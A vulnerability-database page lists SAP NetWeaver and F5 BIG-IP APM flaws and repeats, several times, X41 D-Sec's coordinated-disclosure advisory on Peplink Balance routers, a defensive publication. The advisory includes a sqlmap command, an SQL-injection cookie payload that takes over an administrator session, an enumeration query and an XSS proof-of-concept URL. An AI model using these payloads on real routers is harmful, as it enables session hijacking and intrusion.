VARIoT IoT vulnerabilities database

SAP NetWeaver is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.

SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

In F5 BIG-IP APM 12.0.0 through 12.1.2 and 13.0.0, an authenticated user with an established access session to the BIG-IP APM system may be able to cause a traffic disruption if the length of the requested URL is less than 16 characters. F5 BIG-IP APM Contains a range error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. F5BIG-IP is a load balancer that uses a variety of allocation algorithms to distribute network requests to available servers in a server cluster. By managing incoming web data traffic and increasing effective network bandwidth, network visitors get as much as possible. The hardware device for the best networking experience. F5BIG-IPAPM has a remote denial of service vulnerability. Remote authentication users can use this vulnerability to submit a specially crafted URL of less than 16 characters to cause the target system to generate a denial of service. F5 BIG-IP Access Policy Manager (APM) is a set of access and security solutions from F5 Corporation of the United States. The solution provides unified access to business-critical applications and networks. A security vulnerability exists in F5 BIG-IP APM versions 12.0.0 through 12.1.2 and 13.0.0. An attacker could exploit this vulnerability to disrupt traffic

In F5 BIG-IP APM 12.0.0 through 12.1.2, non-authenticated users may be able to inject JavaScript into a request that will then be rendered and executed in the context of the Administrative user when the Administrative user is viewing the Access System Logs, allowing the non-authenticated user to carry out a Cross Site Scripting (XSS) attack against the Administrative user. F5 BIG-IP APM Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. F5BIG-IP is a load balancer that uses a variety of allocation algorithms to distribute network requests to available servers in a server cluster. By managing incoming web data traffic and increasing effective network bandwidth, network visitors get as much as possible. The hardware device for the best networking experience. A cross-site scripting vulnerability exists in F5BIG-IPAPM version 12.0.0 through 12.1.2. An attacker could exploit this vulnerability to inject JavaScript into a request to implement a cross-site scripting attack. F5 BIG-IP Access Policy Manager (APM) is a set of access and security solutions from F5 Corporation of the United States. The solution provides unified access to business-critical applications and networks

XSS via syncid exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The affected script is cgi-bin/HASync/hasync.cgi. plural Peplink Balance Device product firmware cgi-bin/HASync/hasync.cgi Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. PeplinkBalance305 is a multi-export load balancing router for medium-sized enterprises. A remote attacker can exploit this vulnerability to inject arbitrary web scripts or HTML with the help of the \342\200\230syncid\342\200\231 parameter. Peplink Balance 305 etc. The following products are affected: Peplink Balance 305; 380; 580; 710; 1350; 2500. X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers =================================================== Overview -------- Confirmed Affected Versions: 7.0.0-build1904 Confirmed Patched Versions: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin Vulnerable Firmware: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin Models: Balance Routers 305, 380, 580, 710, 1350, 2500 Vendor: Peplink Vendor URL: https://www.peplink.com/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn Additional Credits: Claus Overbeck (Abovo IT) Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/ Summary and Impact ------------------ Several issues have been identified, which allow attackers to access the administrative web interface with admin credentials, delete files, perform CSRF and XSS attacks. Product Description ------------------- From the vendor webpage: Use Load Balancing and SpeedFusion bandwidth bonding to deliver superfast VoIP, video streaming, and data using an SD-WAN enabled network. Even with a basic Balance 20 dual-WAN router, you can mix different transport technologies and providers to keep your network up when individual links go down. Switching between links is automatic and seamless. SQL Injection via bauth Cookie ============================== Severity Rating: Critical Vector: Network CVE: CVE-2017-8835 CWE: 89 CVSS Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Summary and Impact ------------------ Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command: ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log --prefix "'" --suffix "--" -a The vulnerability in the Peplink device allows to access the SQLite session database containing user and session variables. By using the the following cookie in a web request, it is possible to select a running administrator session to be used for the attackers login. bauth=-12' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2 By forming specialised SQL queries, it is possible to retrieve usernames from the database. This worked by returning a valid session in case the username existed and no session if it did not exist. In the first case the server did not set a new session cookie in the response to the request. SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='username' and substr(v.value,1,3)='adm') Workarounds ----------- Install vendor supplied update. No CSRF Protection ================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8836 CWE: 352 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ The CGI scripts in the administrative interface are not protected against cross site request forgery attacks. This allows an attacker to execute commands, if a logged in user visits a malicious website. This can for example be used to change the credentials of the administrative webinterface. Workarounds ----------- Install vendor supplied update. Passwords stored in Cleartext ============================= Severity Rating: Medium Vector: Network CVE: CVE-2017-8837 CWE: 256 CVSS Score: 4.0 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ The Peplink devices store passwords in cleartext in the files /etc/waipass and /etc/roapass. In case one of these devices is compromised the attacker can gain access to the cleartext passwords and abuse them to compromise further systems. Workarounds ----------- Install vendor supplied update. XSS via syncid Parameter ======================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8838 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the syncid parameter to trigger a cross-site-scripting issue by calling https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. XSS via preview.cgi =================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8839 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the the orig_url parameter to trigger a cross-site-scripting issue in /guest/preview.cgi. The injection is directly into existing JavaScript. This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. File Deletion ============= Severity Rating: Medium Vector: Network CVE: CVE-2017-8841 CWE: 73 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H Summary and Impact ------------------ A logged in user can delete arbitrary files on the Peplink devices, by abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path is provided to the upfile.path parameter the file provided in the path is deleted during the process. This can be abused to cause a denial of service (DoS). In combination with the missing CSRF protection, this can be abused remotely via a logged in user. Workarounds ----------- Install vendor supplied update. Information Disclosure ====================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8840 CWE: 200 CVSS Score: 5.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to retrieve sensitive information without a valid login by opening cgi-bin/HASync/hasync.cgi?debug=1 This displays the following: -----8<------------------------------------------------ Master LAN Address = [ <internal ip> / <netmask> ] Serial Number = [ <serial number> ] HA Group ID = [ <group id> ] Virtual IP = [ <internal ip> / <netmask> ] Submitted syncid = [ <syncid> ] -----8<------------------------------------------------ This information can be valuable for an attacker to exploit other issues. Workarounds ----------- Install vendor supplied update. About X41 D-Sec GmbH -------------------- X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline -------- 2017-04-07 Issue found 2017-04-10 Vendor asked for security contact 2017-04-11 Vendor replied, send GPG key 2017-04-11 Information supplied to vendor 2017-04-11 Vendor acknowledges that the information is received 2017-04-17 Vendor acknowledges SQL injection 2017-05-08 CVE IDs for all issues requested 2017-05-08 CVE IDs assigned 2017-05-11 Vendor informed about CVE IDs 2017-05-29 Version provided to X41 for testing 2017-05-31 First test results send back to the vendor 2017-06-01 Remaining test results send back to the vendor 2017-06-05 Coordinated Firmware and Advisory release -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 GeschA$?ftsfA1/4hrer: Markus Vervier

XSS via orig_url exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The affected script is guest/preview.cgi. plural Peplink Balance Device product firmware guest/preview.cgi Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. PeplinkBalance305 is a multi-export load balancing router for medium-sized enterprises. A remote attacker can exploit this vulnerability to inject arbitrary web scripts or HTML with the help of the \342\200\230orig_url\342\200\231 parameter. Peplink Balance 305 etc. The following products are affected: Peplink Balance 305; 380; 580; 710; 1350; 2500. X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers =================================================== Overview -------- Confirmed Affected Versions: 7.0.0-build1904 Confirmed Patched Versions: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin Vulnerable Firmware: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin Models: Balance Routers 305, 380, 580, 710, 1350, 2500 Vendor: Peplink Vendor URL: https://www.peplink.com/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn Additional Credits: Claus Overbeck (Abovo IT) Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/ Summary and Impact ------------------ Several issues have been identified, which allow attackers to access the administrative web interface with admin credentials, delete files, perform CSRF and XSS attacks. Product Description ------------------- From the vendor webpage: Use Load Balancing and SpeedFusion bandwidth bonding to deliver superfast VoIP, video streaming, and data using an SD-WAN enabled network. Even with a basic Balance 20 dual-WAN router, you can mix different transport technologies and providers to keep your network up when individual links go down. Switching between links is automatic and seamless. SQL Injection via bauth Cookie ============================== Severity Rating: Critical Vector: Network CVE: CVE-2017-8835 CWE: 89 CVSS Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Summary and Impact ------------------ Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command: ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log --prefix "'" --suffix "--" -a The vulnerability in the Peplink device allows to access the SQLite session database containing user and session variables. By using the the following cookie in a web request, it is possible to select a running administrator session to be used for the attackers login. bauth=-12' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2 By forming specialised SQL queries, it is possible to retrieve usernames from the database. This worked by returning a valid session in case the username existed and no session if it did not exist. In the first case the server did not set a new session cookie in the response to the request. SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='username' and substr(v.value,1,3)='adm') Workarounds ----------- Install vendor supplied update. No CSRF Protection ================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8836 CWE: 352 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ The CGI scripts in the administrative interface are not protected against cross site request forgery attacks. This allows an attacker to execute commands, if a logged in user visits a malicious website. This can for example be used to change the credentials of the administrative webinterface. Workarounds ----------- Install vendor supplied update. Passwords stored in Cleartext ============================= Severity Rating: Medium Vector: Network CVE: CVE-2017-8837 CWE: 256 CVSS Score: 4.0 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ The Peplink devices store passwords in cleartext in the files /etc/waipass and /etc/roapass. In case one of these devices is compromised the attacker can gain access to the cleartext passwords and abuse them to compromise further systems. Workarounds ----------- Install vendor supplied update. XSS via syncid Parameter ======================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8838 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the syncid parameter to trigger a cross-site-scripting issue by calling https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. XSS via preview.cgi =================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8839 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the the orig_url parameter to trigger a cross-site-scripting issue in /guest/preview.cgi. The injection is directly into existing JavaScript. This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. File Deletion ============= Severity Rating: Medium Vector: Network CVE: CVE-2017-8841 CWE: 73 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H Summary and Impact ------------------ A logged in user can delete arbitrary files on the Peplink devices, by abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path is provided to the upfile.path parameter the file provided in the path is deleted during the process. This can be abused to cause a denial of service (DoS). In combination with the missing CSRF protection, this can be abused remotely via a logged in user. Workarounds ----------- Install vendor supplied update. Information Disclosure ====================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8840 CWE: 200 CVSS Score: 5.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to retrieve sensitive information without a valid login by opening cgi-bin/HASync/hasync.cgi?debug=1 This displays the following: -----8<------------------------------------------------ Master LAN Address = [ <internal ip> / <netmask> ] Serial Number = [ <serial number> ] HA Group ID = [ <group id> ] Virtual IP = [ <internal ip> / <netmask> ] Submitted syncid = [ <syncid> ] -----8<------------------------------------------------ This information can be valuable for an attacker to exploit other issues. Workarounds ----------- Install vendor supplied update. About X41 D-Sec GmbH -------------------- X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline -------- 2017-04-07 Issue found 2017-04-10 Vendor asked for security contact 2017-04-11 Vendor replied, send GPG key 2017-04-11 Information supplied to vendor 2017-04-11 Vendor acknowledges that the information is received 2017-04-17 Vendor acknowledges SQL injection 2017-05-08 CVE IDs for all issues requested 2017-05-08 CVE IDs assigned 2017-05-11 Vendor informed about CVE IDs 2017-05-29 Version provided to X41 for testing 2017-05-31 First test results send back to the vendor 2017-06-01 Remaining test results send back to the vendor 2017-06-05 Coordinated Firmware and Advisory release -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 GeschA$?ftsfA1/4hrer: Markus Vervier

Debug information disclosure exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. A direct request to cgi-bin/HASync/hasync.cgi?debug=1 shows Master LAN Address, Serial Number, HA Group ID, Virtual IP, and Submitted syncid. PeplinkBalance305 is a multi-export load balancing router for medium-sized enterprises. Peplink Balance 305 etc. The following products are affected: Peplink Balance 305; 380; 580; 710; 1350; 2500. X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers =================================================== Overview -------- Confirmed Affected Versions: 7.0.0-build1904 Confirmed Patched Versions: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin Vulnerable Firmware: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin Models: Balance Routers 305, 380, 580, 710, 1350, 2500 Vendor: Peplink Vendor URL: https://www.peplink.com/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn Additional Credits: Claus Overbeck (Abovo IT) Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/ Summary and Impact ------------------ Several issues have been identified, which allow attackers to access the administrative web interface with admin credentials, delete files, perform CSRF and XSS attacks. Product Description ------------------- From the vendor webpage: Use Load Balancing and SpeedFusion bandwidth bonding to deliver superfast VoIP, video streaming, and data using an SD-WAN enabled network. Even with a basic Balance 20 dual-WAN router, you can mix different transport technologies and providers to keep your network up when individual links go down. Switching between links is automatic and seamless. SQL Injection via bauth Cookie ============================== Severity Rating: Critical Vector: Network CVE: CVE-2017-8835 CWE: 89 CVSS Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Summary and Impact ------------------ Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command: ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log --prefix "'" --suffix "--" -a The vulnerability in the Peplink device allows to access the SQLite session database containing user and session variables. By using the the following cookie in a web request, it is possible to select a running administrator session to be used for the attackers login. bauth=-12' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2 By forming specialised SQL queries, it is possible to retrieve usernames from the database. This worked by returning a valid session in case the username existed and no session if it did not exist. In the first case the server did not set a new session cookie in the response to the request. SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='username' and substr(v.value,1,3)='adm') Workarounds ----------- Install vendor supplied update. No CSRF Protection ================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8836 CWE: 352 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ The CGI scripts in the administrative interface are not protected against cross site request forgery attacks. This allows an attacker to execute commands, if a logged in user visits a malicious website. This can for example be used to change the credentials of the administrative webinterface. Workarounds ----------- Install vendor supplied update. Passwords stored in Cleartext ============================= Severity Rating: Medium Vector: Network CVE: CVE-2017-8837 CWE: 256 CVSS Score: 4.0 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ The Peplink devices store passwords in cleartext in the files /etc/waipass and /etc/roapass. In case one of these devices is compromised the attacker can gain access to the cleartext passwords and abuse them to compromise further systems. Workarounds ----------- Install vendor supplied update. XSS via syncid Parameter ======================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8838 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the syncid parameter to trigger a cross-site-scripting issue by calling https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. XSS via preview.cgi =================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8839 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the the orig_url parameter to trigger a cross-site-scripting issue in /guest/preview.cgi. The injection is directly into existing JavaScript. This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. File Deletion ============= Severity Rating: Medium Vector: Network CVE: CVE-2017-8841 CWE: 73 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H Summary and Impact ------------------ A logged in user can delete arbitrary files on the Peplink devices, by abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path is provided to the upfile.path parameter the file provided in the path is deleted during the process. This can be abused to cause a denial of service (DoS). In combination with the missing CSRF protection, this can be abused remotely via a logged in user. Workarounds ----------- Install vendor supplied update. Workarounds ----------- Install vendor supplied update. About X41 D-Sec GmbH -------------------- X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline -------- 2017-04-07 Issue found 2017-04-10 Vendor asked for security contact 2017-04-11 Vendor replied, send GPG key 2017-04-11 Information supplied to vendor 2017-04-11 Vendor acknowledges that the information is received 2017-04-17 Vendor acknowledges SQL injection 2017-05-08 CVE IDs for all issues requested 2017-05-08 CVE IDs assigned 2017-05-11 Vendor informed about CVE IDs 2017-05-29 Version provided to X41 for testing 2017-05-31 First test results send back to the vendor 2017-06-01 Remaining test results send back to the vendor 2017-06-05 Coordinated Firmware and Advisory release -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 GeschA$?ftsfA1/4hrer: Markus Vervier

Arbitrary file deletion exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The attack methodology is absolute path traversal in cgi-bin/MANGA/firmware_process.cgi via the upfile.path parameter. plural Peplink Balance Device product firmware contains a path traversal vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. PeplinkBalance305 is a multi-export load balancing router for medium-sized enterprises. An attacker could exploit this vulnerability by abusing the /cgi-bin/MANGA/firmware_process.cgi file to remove any files. Peplink Balance 305 etc. The following products are affected: Peplink Balance 305; 380; 580; 710; 1350; 2500. X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers =================================================== Overview -------- Confirmed Affected Versions: 7.0.0-build1904 Confirmed Patched Versions: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin Vulnerable Firmware: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin Models: Balance Routers 305, 380, 580, 710, 1350, 2500 Vendor: Peplink Vendor URL: https://www.peplink.com/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn Additional Credits: Claus Overbeck (Abovo IT) Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/ Summary and Impact ------------------ Several issues have been identified, which allow attackers to access the administrative web interface with admin credentials, delete files, perform CSRF and XSS attacks. Product Description ------------------- From the vendor webpage: Use Load Balancing and SpeedFusion bandwidth bonding to deliver superfast VoIP, video streaming, and data using an SD-WAN enabled network. Even with a basic Balance 20 dual-WAN router, you can mix different transport technologies and providers to keep your network up when individual links go down. Switching between links is automatic and seamless. SQL Injection via bauth Cookie ============================== Severity Rating: Critical Vector: Network CVE: CVE-2017-8835 CWE: 89 CVSS Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Summary and Impact ------------------ Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command: ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log --prefix "'" --suffix "--" -a The vulnerability in the Peplink device allows to access the SQLite session database containing user and session variables. By using the the following cookie in a web request, it is possible to select a running administrator session to be used for the attackers login. bauth=-12' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2 By forming specialised SQL queries, it is possible to retrieve usernames from the database. This worked by returning a valid session in case the username existed and no session if it did not exist. In the first case the server did not set a new session cookie in the response to the request. SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='username' and substr(v.value,1,3)='adm') Workarounds ----------- Install vendor supplied update. No CSRF Protection ================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8836 CWE: 352 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ The CGI scripts in the administrative interface are not protected against cross site request forgery attacks. This allows an attacker to execute commands, if a logged in user visits a malicious website. This can for example be used to change the credentials of the administrative webinterface. Workarounds ----------- Install vendor supplied update. Passwords stored in Cleartext ============================= Severity Rating: Medium Vector: Network CVE: CVE-2017-8837 CWE: 256 CVSS Score: 4.0 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ The Peplink devices store passwords in cleartext in the files /etc/waipass and /etc/roapass. In case one of these devices is compromised the attacker can gain access to the cleartext passwords and abuse them to compromise further systems. Workarounds ----------- Install vendor supplied update. XSS via syncid Parameter ======================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8838 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the syncid parameter to trigger a cross-site-scripting issue by calling https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. XSS via preview.cgi =================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8839 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the the orig_url parameter to trigger a cross-site-scripting issue in /guest/preview.cgi. The injection is directly into existing JavaScript. This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. File Deletion ============= Severity Rating: Medium Vector: Network CVE: CVE-2017-8841 CWE: 73 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H Summary and Impact ------------------ A logged in user can delete arbitrary files on the Peplink devices, by abusing the /cgi-bin/MANGA/firmware_process.cgi. This can be abused to cause a denial of service (DoS). In combination with the missing CSRF protection, this can be abused remotely via a logged in user. Workarounds ----------- Install vendor supplied update. Information Disclosure ====================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8840 CWE: 200 CVSS Score: 5.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to retrieve sensitive information without a valid login by opening cgi-bin/HASync/hasync.cgi?debug=1 This displays the following: -----8<------------------------------------------------ Master LAN Address = [ <internal ip> / <netmask> ] Serial Number = [ <serial number> ] HA Group ID = [ <group id> ] Virtual IP = [ <internal ip> / <netmask> ] Submitted syncid = [ <syncid> ] -----8<------------------------------------------------ This information can be valuable for an attacker to exploit other issues. Workarounds ----------- Install vendor supplied update. About X41 D-Sec GmbH -------------------- X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline -------- 2017-04-07 Issue found 2017-04-10 Vendor asked for security contact 2017-04-11 Vendor replied, send GPG key 2017-04-11 Information supplied to vendor 2017-04-11 Vendor acknowledges that the information is received 2017-04-17 Vendor acknowledges SQL injection 2017-05-08 CVE IDs for all issues requested 2017-05-08 CVE IDs assigned 2017-05-11 Vendor informed about CVE IDs 2017-05-29 Version provided to X41 for testing 2017-05-31 First test results send back to the vendor 2017-06-01 Remaining test results send back to the vendor 2017-06-05 Coordinated Firmware and Advisory release -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 GeschA$?ftsfA1/4hrer: Markus Vervier

